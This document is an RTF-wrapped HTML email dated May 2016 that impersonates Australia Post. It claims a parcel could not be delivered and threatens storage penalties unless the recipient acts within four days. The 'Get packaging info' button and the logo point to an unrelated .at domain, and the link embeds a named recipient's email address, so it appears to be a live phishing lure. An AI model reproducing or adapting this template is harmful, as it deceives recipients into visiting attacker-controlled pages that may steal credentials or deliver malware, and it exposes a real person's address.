{\rtf1\ansi\ansicpg1251\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag243 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">}
{\*\htmltag19 <html xmlns="http://www.w3.org/1999/xhtml">}
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag50 <body>}
{\*\htmltag0 \par }
{\*\htmltag96 <table style="WIDTH: 800px; BORDER-COLLAPSE: collapse; FONT-FAMILY: Arial, Helvetica, sans-serif; BACKGROUND: #fff; HEIGHT: 600px; COLOR: #5e514d; FONT-SIZE: 13px">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag96 <tbody>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr style="WIDTH: 100%; FLOAT: left">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="POSITION: relative; WIDTH: 100%; FLOAT: left; HEIGHT: 105px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="Z-INDEX: 2; POSITION: absolute; TOP: 0px; LEFT: 40px" href="#">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <img alt="AUSPOST" src="http://eurosignal.at/NEjtKqOTJDSI/dO8XDGehajP7K.png">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://eurosignal.at/NEjtKqOTJDSI/dO8XDGehajP7K.png"}}{\fldrslt\cf1\ul {\chbrdr\brdrsh AUSPOST}}}\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag4  }
{\*\htmltag84 <a style="POSITION: absolute; PADDING-BOTTOM: 0px; LINE-HEIGHT: 1.3em; PADDING-LEFT: 73px; WIDTH: 134px; PADDING-RIGHT: 0px; DISPLAY: block; BACKGROUND: #dc1928; HEIGHT: 73px; COLOR: #fff; FONT-SIZE: 18px; TOP: 0px; TEXT-DECORATION: none; PADDING-TOP: 35px; LEFT: 40px; border-radius: 0 0 10px 10px" href="#">}\htmlrtf {\htmlrtf0 Australia
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <span style="TEXT-TRANSFORM: uppercase; FONT-FAMILY: 'Arial Black', Gadget, sans-serif; FONT-SIZE: 34px">}\htmlrtf {\htmlrtf0 Post
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>} 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag84 <span style="POSITION: absolute; TEXT-ALIGN: center; WIDTH: 467px; DISPLAY: block; FONT-SIZE: 10px; TOP: 20px; RIGHT: 40px">}\htmlrtf {\htmlrtf0 AusPost 
{\*\htmltag4 \par }
{\*\htmltag84       }Ground Delivery Service 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr style="WIDTH: 100%; FLOAT: left">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="PADDING-BOTTOM: 40px; PADDING-LEFT: 40px; PADDING-RIGHT: 40px; FLOAT: left; PADDING-TOP: 40px">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag68 <p>}Your package has experienced an exception and has been returned to the 
{\*\htmltag4 \par }
{\*\htmltag84       }Australia Post office. To collect the parcel please print out the shipping 
{\*\htmltag4 \par }
{\*\htmltag84       }label
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 and visit Australia Post facility.\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag96 <table>}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240         }
{\*\htmltag96 <tbody>}
{\*\htmltag0 \par }
{\*\htmltag240         }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 Date:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 16 May 2016
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240         }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 Tracking #:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 2420731
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240         }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 Weight:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 1.81 kg 
{\*\htmltag4 \par }
{\*\htmltag84         }\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 Reason:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84           }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 Not deliverable as addressed 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag104 </tbody>}
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag96 <hr style="BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; MARGIN: 16px 0px 7px; WIDTH: 100%; BORDER-TOP-STYLE: none; BACKGROUND: #f3f1ee; FLOAT: left; HEIGHT: 4px; BORDER-LEFT-STYLE: none">}\htmlrtf {\f1\qc\qj\uldb \~ _____ \~\line\par}
\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p style="COLOR: #9a9a9a; FONT-SIZE: 11px">}\htmlrtf \par
\htmlrtf0 \htmlrtf {\htmlrtf0 When you ship a parcel with us 
{\*\htmltag4 \par }
{\*\htmltag84       }we will capture the details of the parcel including shipping activities 
{\*\htmltag4 \par }
{\*\htmltag84       }(for tracking purposes), the weight and dimensions of the parcel, and the 
{\*\htmltag4 \par }
{\*\htmltag84       }sender and receiver details. This information allows us to route the 
{\*\htmltag4 \par }
{\*\htmltag84       }package and to respond to queries from both the sender and the 
{\*\htmltag4 \par }
{\*\htmltag84       }receiver.
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 The Australia Post site contains links to other sites. We are 
{\*\htmltag4 \par }
{\*\htmltag84       }not responsible for the privacy practices or the content of such websites. 
{\*\htmltag4 \par }
{\*\htmltag84       }We encourage you to read and understand the privacy policies on those 
{\*\htmltag4 \par }
{\*\htmltag84       }websites prior to providing any information to them. \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag96 <hr style="BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; MARGIN: 1px 0px 5px; WIDTH: 100%; BORDER-TOP-STYLE: none; BACKGROUND: #f3f1ee; FLOAT: left; HEIGHT: 4px; BORDER-LEFT-STYLE: none">}\htmlrtf {\f1\qc\qj\uldb \~ _____ \~\line\par}
\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240       }{\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="WIDTH: 100%; DISPLAY: block; FLOAT: left">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="PADDING-BOTTOM: 8px; MARGIN: 0px 30px 0px 0px; PADDING-LEFT: 30px; PADDING-RIGHT: 30px; DISPLAY: inline-block; BACKGROUND: #dc1928; FLOAT: right; COLOR: #fff; FONT-SIZE: 13px; FONT-WEIGHT: bold; TEXT-DECORATION: none; PADDING-TOP: 8px; border-radius: 3px" href="http://eurosignal.at/NEjtKqOTJDSI/0ewc7JgqWaO.php?id=mark.nella@cevalogistics.com" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://eurosignal.at/NEjtKqOTJDSI/0ewc7JgqWaO.php?id=mark.nella@cevalogistics.com" \\n}}{\fldrslt\cf1\ul \htmlrtf0 Get 
{\*\htmltag4 \par }
{\*\htmltag84       }packaging info\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>} 
{\*\htmltag4 \par }
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84       }{\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag96 <hr style="BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; MARGIN: 5px 0px 0px; WIDTH: 100%; BORDER-TOP-STYLE: none; BACKGROUND: #f3f1ee; FLOAT: left; HEIGHT: 2px; BORDER-LEFT-STYLE: none">}\htmlrtf {\f1\qc\qj\uldb \~ _____ \~\line\par}
\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <h1 style="MARGIN: 10px 0px; WIDTH: 100%; FLOAT: left; COLOR: #000; FONT-SIZE: 25px">}\htmlrtf {\fs48 \par\b \htmlrtf0 \htmlrtf {\htmlrtf0 \htmlrtf {\fs48 \htmlrtf0 Attention\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par }\htmlrtf0 
{\*\htmltag72 </h1>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf \par
\htmlrtf0 \htmlrtf {\htmlrtf0 Penalties are imposed for storage of the parcel if you fail to collect 
{\*\htmltag4 \par }
{\*\htmltag84       }it within 4 days. The detailed information about storage is available at 
{\*\htmltag4 \par }
{\*\htmltag84       }our website.\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <strong>}\htmlrtf {\b \htmlrtf0 Please note:
{\*\htmltag92 </strong>}\htmlrtf }\htmlrtf0  You might be required to show a valid 
{\*\htmltag4 \par }
{\*\htmltag84       }ID.\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag248 </td>}
{\*\htmltag72 </tr>}
{\*\htmltag104 </tbody>}
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag58 </body>}
{\*\htmltag27 </html>}
{\*\htmltag3 \par }} i	ed73
2